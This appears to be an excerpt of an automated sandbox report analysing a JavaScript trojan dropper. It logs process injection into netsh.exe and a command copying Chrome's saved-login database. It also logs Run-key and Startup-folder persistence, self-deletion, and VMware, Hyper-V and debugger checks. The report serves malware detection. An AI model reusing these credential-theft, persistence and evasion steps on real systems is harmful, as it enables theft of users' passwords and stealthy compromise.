Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\ORYNeBzyRj.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@18/5@33/18
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities
Source: Binary string: netsh.pdb source: bin.exe, 00000002.00000002.402067381.0000000001910000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000002.402156937.0000000001940000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.296788051.00000000017A4000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.403727008.0000000001A5F000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.293862136.000000000160F000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.403509898.0000000003122000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.401276125.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.894403517.00000000033DF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.841416056.00000000032C0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: bin.exe, 00000002.00000002.402067381.0000000001910000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, 00000002.00000002.402156937.0000000001940000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.296788051.00000000017A4000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.403727008.0000000001A5F000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.293862136.000000000160F000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000012.00000003.403509898.0000000003122000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000003.401276125.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.894403517.00000000033DF000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000012.00000002.841416056.00000000032C0000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013AC928 push cs; retf 2_2_013AC935
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A492D push eax; ret 2_2_013A492E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BEB3B push dword ptr [7D52CE57h]; ret 2_2_013BEB5E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013B72B3 push eax; retf 2_2_013B72B4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD625 push eax; ret 2_2_013BD678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD67B push eax; ret 2_2_013BD6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD672 push eax; ret 2_2_013BD678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BD6DC push eax; ret 2_2_013BD6E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0333D0D1 push ecx; ret 18_2_0333D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0091C928 push cs; retf 18_2_0091C935
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0091492D push eax; ret 18_2_0091492E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_009272B3 push eax; retf 18_2_009272B4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092EB3B push dword ptr [7D52CE57h]; ret 18_2_0092EB5E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D6DC push eax; ret 18_2_0092D6E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D625 push eax; ret 18_2_0092D678
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D672 push eax; ret 18_2_0092D678
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092D67B push eax; ret 18_2_0092D6E2
Source: CIQ-PO116266.js String : entropy: 5.56, length: 330788, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gImRtOXBaQ0FvSVVGeWNtRjVMbkJ5YjNSdmRIbHdaUzVtYjNKRllXTm9JRDhnUVhKeVlYa3V
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe

Boot Survival

Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK
Source: C:\Windows\SysWOW64\netsh.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0JOHZLNP6ZC
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORYNeBzyRj.js
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 00000000013A8C04 second address: 00000000013A8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 00000000013A8F9E second address: 00000000013A8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000918C04 second address: 0000000000918C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000918F9E second address: 0000000000918FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 4472 Thread sleep time: -55000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 6668 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\netsh.exe TID: 6668 Thread sleep time: -84000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A8ED0 rdtsc 2_2_013A8ED0
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00921660 FindFirstFileW,FindNextFileW,FindClose, 18_2_00921660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_00921659 FindFirstFileW,FindNextFileW,FindClose, 18_2_00921659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: explorer.exe, 00000004.00000000.376453870.0000000008154000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.376690845.0000000008290000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 00000004.00000000.366044669.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000004.00000000.301406958.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.325767526.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.319705739.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.340979864.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: wscript.exe, 00000001.00000002.837229937.000001922CD43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.830621211.000001922CCE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723845787.000001922CD43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.815966178.00000216E0780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.608071486.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.831511243.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759788856.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759860590.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607995177.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.632243823.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.631696029.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000A.00000003.608046578.00000216E07D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.831489692.00000216E07D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759844357.00000216E07D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWF
Source: explorer.exe, 00000004.00000000.348324828.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: <C:\Users\user\AppData\Roamingd_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.325678427.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: wscript.exe, 0000000D.00000003.631461137.0000013D9179A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.789723461.0000013D9179A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.813432842.0000013D91790000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`(
Source: wscript.exe, 00000001.00000002.834416914.000001922CD37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723831119.000001922CD37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWY"
Source: explorer.exe, 00000004.00000000.376453870.0000000008154000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.325767526.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013A8ED0 rdtsc 2_2_013A8ED0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E4F2E mov eax, dword ptr fs:[00000030h] 18_2_032E4F2E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331E730 mov eax, dword ptr fs:[00000030h] 18_2_0331E730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A131B mov eax, dword ptr fs:[00000030h] 18_2_033A131B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330F716 mov eax, dword ptr fs:[00000030h] 18_2_0330F716
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337FF10 mov eax, dword ptr fs:[00000030h] 18_2_0337FF10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B070D mov eax, dword ptr fs:[00000030h] 18_2_033B070D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A70E mov eax, dword ptr fs:[00000030h] 18_2_0331A70E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03313B7A mov eax, dword ptr fs:[00000030h] 18_2_03313B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EDB60 mov ecx, dword ptr fs:[00000030h] 18_2_032EDB60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FFF60 mov eax, dword ptr fs:[00000030h] 18_2_032FFF60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8F6A mov eax, dword ptr fs:[00000030h] 18_2_033B8F6A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8B58 mov eax, dword ptr fs:[00000030h] 18_2_033B8B58
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EDB40 mov eax, dword ptr fs:[00000030h] 18_2_032EDB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FEF40 mov eax, dword ptr fs:[00000030h] 18_2_032FEF40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EF358 mov eax, dword ptr fs:[00000030h] 18_2_032EF358
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B5BA5 mov eax, dword ptr fs:[00000030h] 18_2_033B5BA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F1B8F mov eax, dword ptr fs:[00000030h] 18_2_032F1B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331B390 mov eax, dword ptr fs:[00000030h] 18_2_0331B390
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03367794 mov eax, dword ptr fs:[00000030h] 18_2_03367794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A138A mov eax, dword ptr fs:[00000030h] 18_2_033A138A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339D380 mov ecx, dword ptr fs:[00000030h] 18_2_0339D380
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F8794 mov eax, dword ptr fs:[00000030h] 18_2_032F8794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033237F5 mov eax, dword ptr fs:[00000030h] 18_2_033237F5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033103E2 mov eax, dword ptr fs:[00000030h] 18_2_033103E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033653CA mov eax, dword ptr fs:[00000030h] 18_2_033653CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339FE3F mov eax, dword ptr fs:[00000030h] 18_2_0339FE3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EE620 mov eax, dword ptr fs:[00000030h] 18_2_032EE620
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F8A0A mov eax, dword ptr fs:[00000030h] 18_2_032F8A0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03303A1C mov eax, dword ptr fs:[00000030h] 18_2_03303A1C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A61C mov eax, dword ptr fs:[00000030h] 18_2_0331A61C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EC600 mov eax, dword ptr fs:[00000030h] 18_2_032EC600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03318E00 mov eax, dword ptr fs:[00000030h] 18_2_03318E00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EAA16 mov eax, dword ptr fs:[00000030h] 18_2_032EAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F766D mov eax, dword ptr fs:[00000030h] 18_2_032F766D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330AE73 mov eax, dword ptr fs:[00000030h] 18_2_0330AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332927A mov eax, dword ptr fs:[00000030h] 18_2_0332927A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339B260 mov eax, dword ptr fs:[00000030h] 18_2_0339B260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8A62 mov eax, dword ptr fs:[00000030h] 18_2_033B8A62
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03374257 mov eax, dword ptr fs:[00000030h] 18_2_03374257
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9240 mov eax, dword ptr fs:[00000030h] 18_2_032E9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F7E41 mov eax, dword ptr fs:[00000030h] 18_2_032F7E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331FAB0 mov eax, dword ptr fs:[00000030h] 18_2_0331FAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E52A5 mov eax, dword ptr fs:[00000030h] 18_2_032E52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033646A7 mov eax, dword ptr fs:[00000030h] 18_2_033646A7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B0EA5 mov eax, dword ptr fs:[00000030h] 18_2_033B0EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FAAB0 mov eax, dword ptr fs:[00000030h] 18_2_032FAAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331D294 mov eax, dword ptr fs:[00000030h] 18_2_0331D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337FE87 mov eax, dword ptr fs:[00000030h] 18_2_0337FE87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F76E2 mov eax, dword ptr fs:[00000030h] 18_2_032F76E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033116E0 mov ecx, dword ptr fs:[00000030h] 18_2_033116E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03312AE4 mov eax, dword ptr fs:[00000030h] 18_2_03312AE4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8ED6 mov eax, dword ptr fs:[00000030h] 18_2_033B8ED6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03328EC7 mov eax, dword ptr fs:[00000030h] 18_2_03328EC7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339FEC0 mov eax, dword ptr fs:[00000030h] 18_2_0339FEC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03312ACB mov eax, dword ptr fs:[00000030h] 18_2_03312ACB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033136CC mov eax, dword ptr fs:[00000030h] 18_2_033136CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0336A537 mov eax, dword ptr fs:[00000030h] 18_2_0336A537
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03314D3B mov eax, dword ptr fs:[00000030h] 18_2_03314D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331513A mov eax, dword ptr fs:[00000030h] 18_2_0331513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8D34 mov eax, dword ptr fs:[00000030h] 18_2_033B8D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03304120 mov eax, dword ptr fs:[00000030h] 18_2_03304120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03304120 mov ecx, dword ptr fs:[00000030h] 18_2_03304120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EAD30 mov eax, dword ptr fs:[00000030h] 18_2_032EAD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9100 mov eax, dword ptr fs:[00000030h] 18_2_032E9100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330C577 mov eax, dword ptr fs:[00000030h] 18_2_0330C577
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EC962 mov eax, dword ptr fs:[00000030h] 18_2_032EC962
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EB171 mov eax, dword ptr fs:[00000030h] 18_2_032EB171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03307D50 mov eax, dword ptr fs:[00000030h] 18_2_03307D50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03323D43 mov eax, dword ptr fs:[00000030h] 18_2_03323D43
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330B944 mov eax, dword ptr fs:[00000030h] 18_2_0330B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03363540 mov eax, dword ptr fs:[00000030h] 18_2_03363540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03311DB5 mov eax, dword ptr fs:[00000030h] 18_2_03311DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033135A1 mov eax, dword ptr fs:[00000030h] 18_2_033135A1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033669A6 mov eax, dword ptr fs:[00000030h] 18_2_033669A6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033161A0 mov eax, dword ptr fs:[00000030h] 18_2_033161A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E2D8A mov eax, dword ptr fs:[00000030h] 18_2_032E2D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331FD9B mov eax, dword ptr fs:[00000030h] 18_2_0331FD9B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330C182 mov eax, dword ptr fs:[00000030h] 18_2_0330C182
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A185 mov eax, dword ptr fs:[00000030h] 18_2_0331A185
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03398DF1 mov eax, dword ptr fs:[00000030h] 18_2_03398DF1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EB1E1 mov eax, dword ptr fs:[00000030h] 18_2_032EB1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FD5E0 mov eax, dword ptr fs:[00000030h] 18_2_032FD5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033741E8 mov eax, dword ptr fs:[00000030h] 18_2_033741E8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FB02A mov eax, dword ptr fs:[00000030h] 18_2_032FB02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331002D mov eax, dword ptr fs:[00000030h] 18_2_0331002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331BC2C mov eax, dword ptr fs:[00000030h] 18_2_0331BC2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03367016 mov eax, dword ptr fs:[00000030h] 18_2_03367016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B4015 mov eax, dword ptr fs:[00000030h] 18_2_033B4015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B740D mov eax, dword ptr fs:[00000030h] 18_2_033B740D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366C0A mov eax, dword ptr fs:[00000030h] 18_2_03366C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A2073 mov eax, dword ptr fs:[00000030h] 18_2_033A2073
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B1074 mov eax, dword ptr fs:[00000030h] 18_2_033B1074
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330746D mov eax, dword ptr fs:[00000030h] 18_2_0330746D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03300050 mov eax, dword ptr fs:[00000030h] 18_2_03300050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337C450 mov eax, dword ptr fs:[00000030h] 18_2_0337C450
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A44B mov eax, dword ptr fs:[00000030h] 18_2_0331A44B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331F0BF mov ecx, dword ptr fs:[00000030h] 18_2_0331F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331F0BF mov eax, dword ptr fs:[00000030h] 18_2_0331F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033290AF mov eax, dword ptr fs:[00000030h] 18_2_033290AF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9080 mov eax, dword ptr fs:[00000030h] 18_2_032E9080
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03363884 mov eax, dword ptr fs:[00000030h] 18_2_03363884
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F849B mov eax, dword ptr fs:[00000030h] 18_2_032F849B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A14FB mov eax, dword ptr fs:[00000030h] 18_2_033A14FB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366CF0 mov eax, dword ptr fs:[00000030h] 18_2_03366CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8CD6 mov eax, dword ptr fs:[00000030h] 18_2_033B8CD6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013AA140 LdrLoadDll, 2_2_013AA140

HIPS / PFW / Operating System Protection Evasion

